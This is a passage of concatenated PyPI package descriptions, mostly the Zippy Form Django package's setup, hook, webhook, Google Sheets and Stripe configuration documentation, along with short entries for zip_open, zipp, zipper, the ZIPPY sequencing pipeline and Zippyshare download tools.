am file2.txt, ok.If you want to open from file-like-object, you can call:>>> zip_fileobj = open('packages2.zip', 'rb') >>> fobj = zopen(zip_fileobj, 'data2.zip/file2.txt') >>> print(fobj.read()) I am file2.txt, ok.then you also call:>>> from StringIO import StringIO >>> zip_payload = open('packages2.zip', 'rb').read() >>> zip_fileobj = StringIO(zip_payload) >>> fobj = zopen(zip_fileobj, 'data2.zip/file2.txt') >>> print(fobj.read()) I am file2.txt, ok.Using sample3: open the file included in package oneselfpackages3.zip is:packages3.zip + foo.py + file1.txt + data3.zip + file3.txtfoo.py:import os from zip_open import zopen def loader(filename): fobj = zopen(os.path.join(os.path.dirname(__file__), filename)) return fobjexecute loader() from interactive shell:>>> import sys >>> sys.path.insert(0, 'packages3.zip') >>> import foo >>> fobj = foo.loader('file1.txt') >>> print(fobj.read()) I am file1.txt, ok. >>> fobj = foo.loader('data3.zip/file3.txt') >>> print(fobj.read()) I am file3.txt, ok.Requirements and dependenciesRequirement: Python 2.4 or laterDependency: Nothing.ToDoAdd tar.gz file support.Add using sample document for egg archive.Support Python3Add module import feature.History0.2.1 (Unreleased)fixed: test broken (open file as binary)use distutils.core.setup if no setuptools.0.2.0 (2011-11-29)Change license from PSL to Apache License 2.0Add feature: open from file-like-object.0.1.0 (2010-7-19)first release
zipp
A pathlib-compatible Zipfile object wrapper. Official backport of the standard libraryPath object.CompatibilityNew features are introduced in this third-party library and later merged into CPython. The following table indicates which versions of this library were contributed to different versions in the standard library:zippstdlib3.153.123.53.113.23.103.3 ??3.91.03.8UsageUsezipp.Pathin place ofzipfile.Pathon any Python.For EnterpriseAvailable as part of the Tidelift Subscription.This project and the maintainers of thousands of other packages are working with Tidelift to deliver one enterprise subscription that covers all of the open source you use.Learn more.
zippath
No description available on PyPI.
zipper
Zipper [![Build Status](https://travis-ci.org/trivio/zipper.png)](https://travis-ci.org/trivio/zipper)======A datastructure, first described by Huet, is used to traverse andmanipulate immutable trees. This library is a port of the zipperimplementation found in Clojure.Usage-----The zipper module provides several functions for creating a Loc object whichrepresents the current focal point in the tree.```>>> import zipper>>> top = zipper.list([1, [2, 3], 4])>>> print top.down().right().node()[2,3]>>> print top.down().right().down().node()2>>> print top.down().right().down().replace(0).root()[1, [0, 3], 4]```
zipper-easy-module
No description available on PyPI.
zippie
UNKNOWN
zippity
UNKNOWN
zippity-py
Zippitydum lil CLI to collect TODOs for ChatGPTInstallationpipxinstallzippity_pyUsageAfter installation, you can use the CLI by running:>zpt--help Usage:zpt[OPTIONS][SOURCE_DIRECTORY]Options:-e,--extensionsTEXT(Default:'.py,.js,.ts')-r,--result_filePATH(Default:'ZIPPITYDO_EXAMPLE.md')-t,--template_filePATH--helpTemplateTemplates are jinja markdown files, that get passed an list of these:FileTodos=TypedDict("FileTodos",{"todos":List[Todo],"content":str,"language":str,"mimetype":str,"name":str,},)EachFileTodowill have a list of todos, like this:Todo=TypedDict("Todo",{"line_number":int,"text":str,},)The default template is intemplate/template.md; once compiled it looks like this:ContributingContributions are welcome. Please make sure to update tests as appropriate.LicenseMIT
zippo
No description available on PyPI.
zippy
UNKNOWN
zippydoc
UNKNOWN
zippyform
Zippy Form is a Django package that simplifies the creation of dynamic forms without requiring any coding.SetupTo integrate the Zippy Form package into your Django project, follow these steps:1. Add Package NameOpen your Django project'ssettings.pyfile.Add the package namezippy_formto your project'sINSTALLED_APPS.2. MigrateOpen your terminal or command prompt.Run the following command to apply the migrations:python manage.py migrate3. Update URL ConfigurationIn your Django project'surls.pyfile, add the following URL path to include the Zippy Form package's URLs:path('form/', include('zippy_form.urls'))By following these setup instructions, you'll successfully integrate the Zippy Form package into your Django project, allowing you to create dynamic forms with ease.API DocumentationClick Hereto view API Documentation.Notes To Developer# Subscribing to Zippy Form Events Using Callback FunctionWhen specific functionalities occur on the Zippy Form, events will be triggered and you can subscribe to these events to receive data in your Django application.Below is a list of events that you can subscribe to:New Account Created:This event is triggered when a new account is successfully created. To subscribe to these event and receive data in your Django app, follow the below stepsOpen your project's settings file (usually namedsettings.py).Import the function that you want to use for subscribing the event. For example:from yourapp.event_subscriptions import zippyform_after_account_createReplace "yourapp.event_subscriptions" with the actual path to your event_subscription function.Add the below snippet to the settings file,ZF_EVENT_AFTER_ACCOUNT_CREATE = zippyform_after_account_createReplace "zippyform_after_account_created" with the name of the function you imported.New Form Created:This event is triggered when a new form is successfully created. To subscribe to these event and receive data in your Django app, follow the below stepsOpen your project's settings file (usually namedsettings.py).Import the function that you want to use for subscribing the event. For example:from yourapp.event_subscriptions import zippyform_after_form_createReplace "yourapp.event_subscriptions" with the actual path to your event_subscription function.Add the below snippet to the settings file,ZF_EVENT_AFTER_FORM_CREATE = zippyform_after_form_createAfter Form Submit:This event is triggered when a form submitted(save or update). To subscribe to these event and receive data in your Django app, follow the below stepsOpen your project's settings file (usually namedsettings.py).Import the function that you want to use for subscribing the event. For example:from yourapp.event_subscriptions import zippyform_after_form_submitReplace "yourapp.event_subscriptions" with the actual path to your event_subscription function.Add the below snippet to the settings file,ZF_EVENT_AFTER_FORM_SUBMIT = zippyform_after_form_submit# Subscribing to Zippy Form Events Using Webhooks1. Enabling Webhooks for Zippy Form:To enable webhooks for your project,Modify your .env file:Open your Django project's.envfile. If it doesn't exist, create one in your project's root directory.Add the following environment variables to enable webhooks:ZF_ENABLE_WEBHOOK=True ZF_WEBHOOK_BROKER_URL=amqp://localhost ZF_WEBHOOK_BACKEND=rpc://Install the python-dotenv Package:Ensure that you have thepython-dotenvpackage installed in your Django application. If it's not installed, you can install it using pip:pip install python-dotenvImport and load .env variables in your settings.py file:In your Django project'ssettings.pyfile (usually found in the project's root directory), import and load the environment variables from the.envfile.from dotenv import load_dotenv import os load_dotenv() ZF_ENABLE_WEBHOOK = str(os.getenv('ZF_ENABLE_WEBHOOK')) ZF_WEBHOOK_BROKER_URL = str(os.getenv('ZF_WEBHOOK_BROKER_URL')) ZF_WEBHOOK_BACKEND = str(os.getenv('ZF_WEBHOOK_BACKEND'))ZF_ENABLE_WEBHOOK:Set this toTrueto enable webhooks for Zippy Form.ZF_WEBHOOK_BROKER_URL:Add the broker URL for Celery (e.g., RabbitMQ URL).ZF_WEBHOOK_BACKEND:Configure the webhook backend (e.g., RabbitMQ).2. Starting a Celery Worker for Zippy Form:You have the flexibility to choose between two approaches for starting the Celery worker. Please follow one of the methods below:Approach 1 (Preferred for Docker Setup):Auto-generate the Celery setup file at the project's root folder by running the following command:python manage.py celery_initOnce the "celery_init.py" file is created, you can start the Celery worker by running the file using the following command:python3 celery_init.pyApproach 2:Create a Bash file (celery.sh) in the root folder of your Django project.Add the following contents to the celery.sh file:export DJANGO_SETTINGS_MODULE='your_project_name.settings' celery -A zippy_form worker -l info --loglevel=info --logfile=celery.log -DSetyour_project_nameto the actual name of your Django project.Once thecelery.shfile is created, run the following command within your virtual environment from the Django project's root folder:source celery.shThis command will start the Celery worker process for Zippy Form in the background.Celery logs will be saved at the Django project's root folder with the namecelery.log.Below is a list of events that you can subscribe to:New Form Created:This event is triggered when a new form is successfully created.After Form Submit:This event is triggered when a form submitted(save or update).# Zippy Form API Hooks1. API: Dynamic Form / Create Form:To handle a specific logic before form created(eg. restrict form creation based on user subscription plan),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_BEFORE_CREATE_FORM = from yourapp.subscriptions import zippyform_before_create_formReplace "zippyform_before_create_form" with the name of the function you imported.To return an error when creating a form, the hook should return this response:def zippyform_before_create_form(account_id): response = {} response['return_response'] = True response['status'] = "error" response['status_code'] = 400 response['msg'] = "Error Message" return responseTo skip return an error when creating a form, the hook should return this response:def zippyform_before_create_form(account_id): response = {} response['return_response'] = False return response2. API: Form Builder / List All Forms With Pagination:To handle a specific logic before response returned(eg. restrict form response based on user subscription plan),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_LIST_ALL_FORMS_FORMAT_SUCCESS_RESPONSE = from yourapp.subscriptions import zippyform_format_form_responseReplace "zippyform_format_form_response" with the name of the function you imported.To include additional data on the form list response:def zippyform_format_form_response(response_data, form_id, account_id): response_data['can_access_form'] = True return response_data3. API: Form Builder / List All Form Fields:To handle a specific logic before response returned(eg. restrict form field response based on user subscription plan),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_FORM_BUILDER_LIST_ALL_FORM_FIELDS_BEFORE_RESPONSE = from yourapp.subscriptions import zippyform_form_builder_before_form_fields_responseReplace "zippyform_form_builder_before_form_fields_response" with the name of the function you imported.To return an error when listing form fields, the hook should return this response:def zippyform_form_builder_before_form_fields_response(current_frontend_url, account_id): response = {} response['return_response'] = True response['status'] = "error" response['status_code'] = 400 response['msg'] = "Error Message" return responseTo skip return an error when listing form fields, the hook should return this response:def zippyform_form_builder_before_form_fields_response(current_frontend_url, account_id): response = {} response['return_response'] = False return response4. API: Form Builder / List All Form Fields:To format the API response(eg. add/remove additional data to form field response),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_FORM_BUILDER_LIST_ALL_FORM_FIELDS_FORMAT_SUCCESS_RESPONSE = from yourapp.subscriptions import zippyform_form_builder_format_form_fields_responseReplace "zippyform_form_builder_format_form_fields_response" with the name of the function you imported.To include additional data on the form field list response:def zippyform_form_builder_format_form_fields_response(response_data, form_id, account_id): response_data['can_access_builder'] = True return response_data5. API: Dynamic Form / Submit Form:To handle a specific logic before form submit(eg. restrict submitting form based on user subscription plan),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_BEFORE_SUBMIT_FORM = from yourapp.subscriptions import zippyform_before_form_submitReplace "zippyform_before_form_submit" with the name of the function you imported. Note: This hook will be called before the form fields validatedTo return an error when submitting form, the hook should return this response:def zippyform_before_form_submit(form_id, account_id): response = {} response['return_response'] = True response['status'] = "error" response['status_code'] = 400 response['msg'] = "Error Message" return responseTo skip return an error when submitting form, the hook should return this response:def zippyform_before_form_submit(form_id, account_id): response = {} response['return_response'] = False return response6. API: Dynamic Form / List All Form Fields:To format the API response(eg. add/remove additional data to form field response),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_DYNAMIC_FORM_LIST_ALL_FORM_FIELDS_FORMAT_SUCCESS_RESPONSE = from yourapp.subscriptions import zippyform_dynamic_form_format_fields_responseReplace "zippyform_dynamic_form_format_fields_response" with the name of the function you imported.To include additional data on the form field list response:def zippyform_dynamic_form_format_fields_response(response_data, form_id, account_id): response_data['can_access_form'] = True return response_data# Overwrite Zippy Form DefaultsApplication Type:By default, Zippy Form is set to operate inStandalonemode. However, to configure Zippy Form to support SaaS applications (Multi-Tenant Applications), include the following line in your project settings file:ZF_APPLICATION_TYPE = 'saas'List Per Page Size:To overwrite the default per page size of list (which is set to 6), you can configure it in the project settings file by adding the following line:ZF_LIST_PER_PAGE = 10Replace "10" with your desired page size value. This allows you to customize the default per page size for the Zippy Form list.Form Field Label Unique:If you need to allow duplicate values for form field labels, you can configure it in the project settings file by adding the following line:ZF_IS_FIELD_LABEL_UNIQUE = FalseFAQ# Q1: Does Zippy Form support multi-step forms?A:Yes, Zippy Form does support multi-step forms, allowing you to create and manage forms with multiple steps to collect information in a structured and user-friendly manner.# Q2: Can a form be created without an account?A:No, an account needs to be created before a form can be created because each form needs to be mapped to an account.# Q3: How many accounts can be created?A:There is no limit to creating accounts. If you are using the package in a standalone application, you can create a single account and map all the forms to it. If you are using the package in a multi-tenant application, you can create an account for each tenant and map the forms under that respective account.# Q4: How can I synchronize my application's user account (tenant) with Zippy Form?A:When creating an account in Zippy Form, include the unique ID associated with your application's user account(tenant) in themeta_detailparameter. This unique ID serves as a linkage between your application and Zippy Form. After you've passed the unique ID, you can retrieve it when Zippy Form events occur. Whether you're using event callback functions or webhooks, themeta_detaildata will be included in the event payload.# Q5: Can I include additional details when creating a form in Zippy Form?A:Yes, you can pass additional details when creating a form in Zippy Form using themeta_detailparameter. This allows you to provide extra information or context related to the form. Subsequently, when Zippy Form events occur, whether you're utilizing event callback functions or webhooks, themeta_detaildata you passed will be included in the event payload, enabling you to access and use it as needed.# Q6: Why are form field labels set as unique?A:Form field labels are set as unique by default to serve as unique identifiers when syncing form submission data to a Google Sheets, ensuring accurate data organization and management. If you wish to override this default behavior, please refer to theOverwrite Zippy Form Defaults > Form Field Label Uniquesection for instructions.# Q7: What does receiving a "permission_error" with a 403 code mean when interacting with an API?A:If you encounter a "permission_error" with a 403 status code, it typically indicates that there is an issue with authentication. This error commonly occurs when you have either missed passing theZF-SECRET-KEYtoken in the header of your API request or theZF-SECRET-KEYtoken provided is invalid. To resolve this, ensure that you include the correct and validZF-SECRET-KEYtoken in your API request's header for proper authentication.# Q8: Where can I obtain the "ZF-SECRET-KEY"?A:You can use your Zippy Form account ID as theZF-SECRET-KEY. This ID uniquely identifies your Zippy Form account. Obtain your Zippy Form account ID by making an API request to theForm Builder / List All Accountsendpoint. This API call will provide you with the necessary account ID to use as theZF-SECRET-KEYin your integration.# Q9: Why am I receiving an "Invalid Form ID" error message when attempting to submit a form?A:You will encounter the "Invalid Form ID" error message when submitting a form if the following conditions are not met:Form Status:The form can only be submitted if its status isactive. If the form is in any other state such asdeleted,inactive, ordraftyou will receive this error message.Form ID Validity:Ensure that the form ID you have provided is accurate and corresponds to an existing, active form. An incorrect or nonexistent form ID will trigger the "Invalid Form ID" error.# Q10: Why are the fields I created not displaying on the form?A:Only active fields will be displayed on the form for submission. To resolve this, you can use theForm Builder / Update FormAPI to update the field status fromdrafttoactiveensuring that they are visible and can be submitted on the form.# Q11: Can I handle my own business logic when an account is created, a form is created, or a form is submitted in Zippy Form?A:Yes, you have the flexibility to handle your own business logic when working with Zippy Form. The approach depends on whether you've installed the Zippy Form package in a standalone application or a multi-tenant application:Standalone Application:If you've integrated Zippy Form into a standalone application, you can subscribe to Zippy Form events using callback functions. This feature enables you to access event data within any function you add to your application.Multi-Tenant Application:For multi-tenant applications, you can subscribe to Zippy Form events using webhooks. Webhooks provide a way to receive real-time notifications about Zippy Form events, and you can handle these events in your application according to your business needs.For detailed instructions on how to implement these approaches, please refer to the "Notes To Developer" section in the Zippy Form documentation, which provides comprehensive information on how to use callback functions and webhooks for event handling.# Q12: Does the "After Form Submit" event trigger after each form step or only at the final step?A:The "After Form Submit" event typically triggers after the last form step has been completed and the entire form has been submitted. This event occurs once the user has finished providing input and confirmed their submission. It does not trigger after each form step but rather at the conclusion of the entire form submission process.# Q13: Does Zippy Form support unique validation?A:Yes, Zippy Form supports unique validation. Unique validation checks submitted entries in forms withdraftandactivestatuses to ensure that values are unique, preventing duplicate entries.# Q14: Can I delete an uploaded file?A:Yes, you can delete an uploaded file. If the field is set as not required, you can simply pass "reset" to the field key when updating the entry, and it will delete the previously uploaded file.# Q15: How can I update a form without adding a new file and retaining the old file?A:To update a form without adding a new file and retain the old file, you can pass an empty value to the field key. This action will skip the required validation during the update and keep the old file intact.# Q16: Why is my media not saving to the media folder in Zippy Form?A:Zippy Form does not control the location where media is saved; instead, it relies on your Django application's configuration. To ensure your media is saved to the correct folder, follow these steps:1. Configure Django Settings:Open your Django project's settings file and add the following snippets:import os API_URL = "http://127.0.0.1:8000" MEDIA_ROOT = os.path.join(BASE_DIR, 'media') MEDIA_FOLDER = '/media/' MEDIA_URL = API_URL + MEDIA_FOLDER2. Update URL Configuration:In your Django project's urls.py file, include the ZippyForm package's URL patterns, and make sure to handle static media files by adding the following:from django.conf import settings from django.conf.urls.static import static urlpatterns = [ ... , path('form/', include('zippy_form.urls')), # Include Zippy Form package's URL patterns here ] + static(settings.MEDIA_FOLDER, document_root=settings.MEDIA_ROOT)By following these steps and configuring your Django project correctly, media files should be saved to the specified media folder.# Q17: How can I make my submitted form data sync to Google Sheet?A:To sync the submitted form data to Google Sheet, follow these steps:Open your project's settings.py file.Add the following snippet to enable the syncing of form submissions to Google Sheet:ZF_GSHEET_SYNC_FORM_SUBMISSION = TrueAdditionally, you need to provide the Google Sheet credentials. Add your credentials to the Zippy Form project settings by assigning them toZF_GSHEET_CREDENTIALS.Sample Gsheet Credentials:ZF_GSHEET_CREDENTIALS = { "type": "service_account", "project_id": "gsheet-test-******", "private_key_id": "", "private_key": "", "client_email": "", "client_id": "", "auth_uri": "", "token_uri": "", "auth_provider_x509_cert_url": "", "client_x509_cert_url": "", "universe_domain": "" }By following these steps, your form submissions will be automatically synchronized with Google Sheet. This ensures that your data is efficiently organized and accessible for further analysis or processing.# Q18: Where can I find the Google Sheet URL to view the data submitted through the form?A:After enabling Google Sheet form submission sync and adding Google Sheet credentials:Create a new form.Once the form is created, Google Sheet will automatically be created and shared with the admin email provided in your account. You can also find the Google Sheet URL on theForm Builder / List All FormsAPI.# Q19: Why is the Google Sheet document created blank after creating a new form?A:The Google Sheet document remains blank initially because the headers for the sheet are synced only when triggering theForm Builder / Update FormAPI. This synchronization ensures that only the active fields from the form are transferred to the Google Sheet as headers, allowing for precise and organized data tracking.# Q20: Can I move/rearrange columns in Google Sheet to different positions directly within the sheet?A:Yes, you can freely move columns to different positions within the Google Sheet. However, it's essential to ensure that you do not modify the column headings while moving them, as altering column headings can lead to synchronization issues with associated data.# Q21: When running celery.sh(source celery.sh) in the virtual environment, I receive the warning "A node named celery@pc-ThinkPad-E14-Gen-3 is already using this process mailbox." How can I fix this issue?A:The warning message "A node named celery@pc-ThinkPad-E14-Gen-3 is already using this process mailbox!" indicates that you have multiple Celery workers running with the same node name, and there's an attempt to use the same process mailbox for these workers. In Celery, each worker should have a unique node name to avoid conflicts.The node name typically consists of the word "celery" followed by a hostname or some identifier that distinguishes it from other workers. In your case, the node name is "celery@pc-ThinkPad-E14-Gen-3," which is derived from your computer's hostname.To resolve this issue:FKill All Running Celery Workers:Run the following command to terminate all running Celery workers:pkill -f "celery"This will stop all Celery workers gracefully and prevent conflicts.Restart Celery Worker process for Zippy Form:To restart the Celery Worker Process for Zippy Form,follow the steps provided in theSubscribing to Zippy Form Events Using Webhookssection, specifically in theStarting a Celery Worker for Zippy Formsubsection.By following these steps, Celery will work properly in your environment.# Q22: How many webhooks can be added to an account?A:There is no limit for adding webhooks to an account. You can add webhooks to an account using theForm Builder / Create WebhookAPI.# Q23: In what timezone will date and timestamps be displayed?A:Date and timestamp will be based on the timezone set for the account.# Q24: What payment gateways are supported in Zippy Form?A:As of now, Zippy Form exclusively supports the Stripe Payment Gateway. We're continuously evaluating and working on integrating additional payment gateways to offer more options in the future.# Q25: What credentials are required to integrate the Stripe Payment Gateway into Zippy Form?A:To integrate the Stripe Payment Gateway into Zippy Form, both test and live secret keys, public keys are necessary. Regardless of whether your application is Standalone or SaaS (Multi-Tenant), follow these steps:Store your Stripe test and live secret keys, public keys securely in a.envfile.Access and utilize these keys within the projectsettings.pyfile using the following configurations:# For Development Environment ZF_PAYMENT_GATEWAY_STRIPE_SECRET_KEY_DEV = "your_test_secret_key_here" ZF_PAYMENT_GATEWAY_STRIPE_PUBLIC_KEY_DEV = "your_test_public_key_here" # For Live/Production Environment ZF_PAYMENT_GATEWAY_STRIPE_SECRET_KEY_LIVE = "your_live_secret_key_here" ZF_PAYMENT_GATEWAY_STRIPE_PUBLIC_KEY_LIVE = "your_live_public_key_here"Ensure to replace "your_test_secret_key_here" and "your_live_secret_key_here" with your respective Stripe test and live secret keys & "your_test_public_key_here" and "your_live_public_key_here" with your respective Stripe test and live public keys. This setup ensures secure and efficient payment processing within Zippy Form, regardless of your application type.If your application is SaaS (Multi-Tenant), follow these steps:Store your Stripe Connect URL securely in a.envfile.Access and utilize these keys within the projectsettings.pyfile using the following configurations:# For Development Environment ZF_PAYMENT_GATEWAY_STRIPE_CONNECT_URL_DEV = "your_test_stripe_connect_url_here" # For Live/Production Environment ZF_PAYMENT_GATEWAY_STRIPE_CONNECT_URL_LIVE = "your_live_stripe_connect_url_here"Ensure to replace "your_test_stripe_connect_url_here" and "your_live_stripe_connect_url_here" with your respective Stripe test and live Connect URL.# Q26: How can I configure the application fee percentage to collect when a tenant receives payment from an end user using Zippy Form in a SaaS application?A:To set the application fee percentage for Stripe within Zippy Form's SaaS application, follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_PAYMENT_GATEWAY_STRIPE_APPLICATION_FEE_PERCENTAGE = from yourapp.subscriptions import stripe_application_fee_percentageReplace "stripe_application_fee_percentage" with the name of the function you imported. Note: Function imported here need to return a positive integer value# Q27: Why isn't the payment form collecting payments?A:If your payment form isn't collecting payments, ensure you've completed these steps:Enable Payment:Ensure that the payment feature is activated for the form.Set Primary Payment Gateway:Set the primary payment gateway within your account settings.Configuration Check:Verify that the payment gateway keys are correctly configured in your project settings.py file.Ensuring payment functionality is enabled, setting a primary payment gateway, and correctly configuring the payment gateway keys within the project settings are essential to facilitate successful payment collection through the form.# Q28: What is the difference between fixed and dynamic price in the payment form settings?A:In the context of payment form settings:Fixed Price:This option is suitable when there's a pre-defined, unchanging amount that needs to be collected upon form submission. For instance, it's commonly used in scenarios like application forms, where the payment amount remains constant regardless of user input.Dynamic Price:Select this option when you want users to input the amount they wish to pay upon form submission. In this case, users have the flexibility to enter the payment amount themselves, such as in donation forms or scenarios where the payment amount can vary based on user discretion. The submitted form collects the specified amount provided by the user.# Q29: How can I incorporate my custom form URL into the Custom Form QR code?A:To incorporate your custom form URL into the Custom Form QR code,Modify your .env file:Open your Django project's.envfile. If it doesn't exist, create one in your project's root directory.Add the following environment variables to enable webhooks:ZF_CUSTOM_FORM_FRONTEND_URL='www.domain.com/form' ZF_CUSTOM_FORM_NON_ADMIN_FRONTEND_URL='www.domain.com/custom_form'Import and load .env variables in your settings.py file:In your Django project'ssettings.pyfile (usually found in the project's root directory), import and load the environment variables from the.envfile.from dotenv import load_dotenv import os load_dotenv() ZF_CUSTOM_FORM_FRONTEND_URL = str(os.getenv('ZF_CUSTOM_FORM_FRONTEND_URL')) ZF_CUSTOM_FORM_NON_ADMIN_FRONTEND_URL = str(os.getenv('ZF_CUSTOM_FORM_NON_ADMIN_FRONTEND_URL'))ReleasesVersionFeatures1.0.0Form Builder, Dynamic Form, Subscribing To Events Using Callback Function1.1.0Sync Submitted Form Entries To Google Sheet1.2.0Webhook Support1.3.0Payment Form
zippy-pipeline
# ZIPPY### The### ZIppy### Pipeline### Prototyping### sYstemZIPPY is a powerful, easy-to-use NGS pipeline prototyping system, with batteries included. ZIPPY helps you create JSON-based pipeline specifications, which it then uses to execute a series of pipeline stages, with no user-written code required.## With ZIPPY, you can:- Generate a new pipeline without any coding required- Auto-generate parameters files from just a list of stages- Use our ultra-modular system for adding new modules, which can then interface with every other module- Make a custom pipeline in 10 minutes or less## ZIPPY includes a variety of modules, including:- Bcl2Fastq- BWA- Picard alignment stats- RSEM- MACS- BAM subsamplingThere will be many more to come! (See the full list of modules [here](https://github.com/Illumina/zippy/wiki/Zippy-modules)).## Limitations:ZIPPY uses black magic that relies upon the CPython implementation of Python. Currently, only CPython 2.7 is supported. ZIPPY also requires several python modules. To make life easier, an executable version of ZIPPY is available (see the releases page!).### Running ZIPPY from sourceIf you would like to run ZIPPY from source, there are a couple of things to note.- You must use CPython 2.7- You must install the modules 'commentjson' and 'pyflow' (note: pyflow is not in pypi, but can be found [here](https://github.com/Illumina/pyflow)). You may optionally install the package 'meta' which may improve the coverage of parameters from make_params if you do not have the source of some of your imported modules (e.g., only .pyc files).- Run the tests file make_params_test.py and see if it's OK!# Using ZIPPY:0. Install ZIPPY by using 'pip install --process-dependency-links zippy-pipeline'1. Make a proto-workflow file.A proto-workflow is a very simple json file that lists the pipeline stages you want, in the order you want them. Here's a simple proto-workflow that I use for some RNA-seq applications:```{"stages": ["bcl2fastq", "rsem"]}```Yeah, that's really it.2. Compile the proto-workflowexecute 'python -m zippy.make_params my_proto.json my_params.json'3. Fill in the blanks and/or connect the dotsOpen up my_params.json and fill in all the parameters that are currently blank.4. Run ZIPPYTo run ZIPPY, execute 'python -m zippy.zippy my_params.json'**More information is on the git wiki.**v2.1.3 (01/28/2019)- Improvements to RNA support (jsnedecor)v2.1.2 (11/13/2018)- Improvements to the bwa module (kwu)- Added stage for copying a folderv2.1.1 (6/14/2018)- Improvements to execution in local mode and other minor fixesv2.1.0 (4/11/2018)- First public release- Parameters 2.0. Support for subworkflows, parameter nesting and environments.- Support for running docker containers through singularity- Better optional parameters support. You can now create the function define_optionals(self), which returns a map of default values for optional parameters.- New stages (Nirvana variant annotation, minimap2 aligner, primer dimer detection)- New unit tests- Fewer known bugsv2.0.0 (2/14/2018)It's here! Release 2.0 inaugurates ZIPPY-as-a-package. You can now pip install ZIPPY, and once you do so, run it as python -m zippy.zippy. Furthermore, you can import zippy from anywhere and use the API. Special thanks to Wilfred Li for this work. As a bonus, we're finally moving to semantic-ish versioning.- ZIPPY as a package- API interface should be finalized- better docker support (can now support docker pull)- several small bugfixes- small documentation improvementsv1.9{6} (12/7/2017)- Provisional ZIPPY API (function names are interfaces not final)- Removed several external dependencies- Parameter detection now defaults to the inspect module, instead of the meta module (i.e., we avoid decompilation when possible)- Support for running locally instead of on SGE- Memory/core requirements can now be set both per-stage and globally- New stages (allowing you to delete intermediate outputs, to convert a bam to a fastq, and to downsample in style with a bloom filter)- DataRunner improvements: can now load sample list from a samplesheet, and can now manually map file names to zippy types- Better support for modules in external files (make_params now supports them fully)- Yet fewer bugs! Or at least... different bugs.v1.99999 (8/30/17)- Support for external modules (Runners defined in external code)- Lots of workflow improvements (argument passing for nearly everything, new bcl2fastq and BWA workflows)- New workflows (DNA/RNA QC, edger and Salmon)- New help system (run 'python zippy.py --help')v1.9999 (5/1/17)- Unit tests- Wildcards in the parameters files- Merge stages- Support for optional parametersv1.999 (2/16/17)- Arbitrary stage chaining- More stages- Fewer bugsv1.99First end-to-end version of ZIPPY## LicenseCopyright 2018 IlluminaLicensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
zippyshare
zippysharezippyshare complete API, CLI file manager, automatic account registration.HierarchyzippyshareDemoExamplepythonSeetest.
zippyshare-downloader
zippyshare-downloaderDownload file from zippyshare directly from pythonTable of ContentsKey FeaturesMinimum Python VersionInstallationPython Packages Index (PyPI)From the sourceSimple UsageCommand Line Interface (CLI)Embedding (API)LinksFAQKey FeaturesInzippyshare-downloaderyou can:download file from Zippyshare (Yes of course).Extract filename, date uploaded, file size, and downloadable url information from given url.Fast Download, allows you to download in 2 connections at same time simultaneously.Minimum Python version3.5.xInstallationPython Packages Index (PyPI)pipinstallzippyshare-downloaderFrom the sourceClone the repositorygit clone https://github.com/mansuf/zippyshare-downloader.git cd zippyshare-downloaderAnd then runsetup.pypython setup.py installNOTE:If you think zippyshare-downloader are already downloaded with latest version, but the app doesn't seems work properly (like this case#11). You can reinstall zippyshare-downloader by following this command:# For Windowspy-3-mpipcachepurgezippyshare_downloader py-3-mpipuninstallzippyshare-downloader py-3-mpipinstall-Uzippyshare-downloader# For Linux / Mac OSpython3-mpipcachepurgezippyshare_downloader python3-mpipuninstallzippyshare-downloader python3-mpipinstall-Uzippyshare-downloaderIf still doesn't work properly that means Zippyshare change their code, you can open issuehereSimple UsageCommand Line Interface (CLI)Readherefor more informationszippyshare-dl"insert zippyshare url here"# orzippyshare-downloader"insert zippyshare url here"# Use this if `zippyshare-dl` and `zippyshare-downloader` didn't workpython-mzippyshare_downloader"insert zippyshare url here"Embedding (API)Usezippyshare-downloaderin your python scriptReadherefor more informationsfromzippyshare_downloaderimportextract_info,extract_info_coro# by default, parameter download is Truefile=extract_info('insert zippyshare url here',download=True)print(file)# Output: <Zippyshare File name="..." size="..."># async versionasyncdefget_info():file=awaitextract_info_coro('insert zippyshare url here',download=True)print(file)LinksDocumentationPyPIFAQQ:I always gettingNameError: The use of "bla bla" is not allowed, what should i do ?A:Zippyshare always change their code, Please update to last version, if your zippyshare-downloader is latest version, then open a issuehere
zippyshare-generator
Generator LinksInstallingInstall and update usingpip:$ pip install zippysharezippyshare supports Python 2 and newer.ExampleWhat does it look like? Here is an example of a simple generate link:$ zippyshare.py -d /root/Downloads"https://www110.zippyshare.com/v/0CtTucxG/file.html"-n"myMovies.mp4"And it will download automaticaly with “Internet Download Manager (IDM) for Windows or build in download managerYou can use on python interpreter>>>fromzippyshareimportzippyshare>>>generator=zippyshare()>>>url_download=generator.generate("https://www110.zippyshare.com/v/0CtTucxG/file.html")>>>generator.download(url_download,".","myMovies.mp4",False)>>>#it will download it automaticallyFor more options use ‘-h’ or ‘–help’$zippyshare.py--helpor$zippyshare--helpSupportDownload With ‘wget’ (linux/windows) or ‘Internet Download Manager (IDM) (Windows) (pip install idm)’Python 2.7 + (only)Windows, LinuxLinksLicense:BSDCode:https://bitbucket.org/licface/zippyshareIssue tracker:https://bitbucket.org/licface/zippyshare/issues
zipr-azure
No description available on PyPI.
zipr-core
No description available on PyPI.
zip-read-yaml
No description available on PyPI.
zipreport
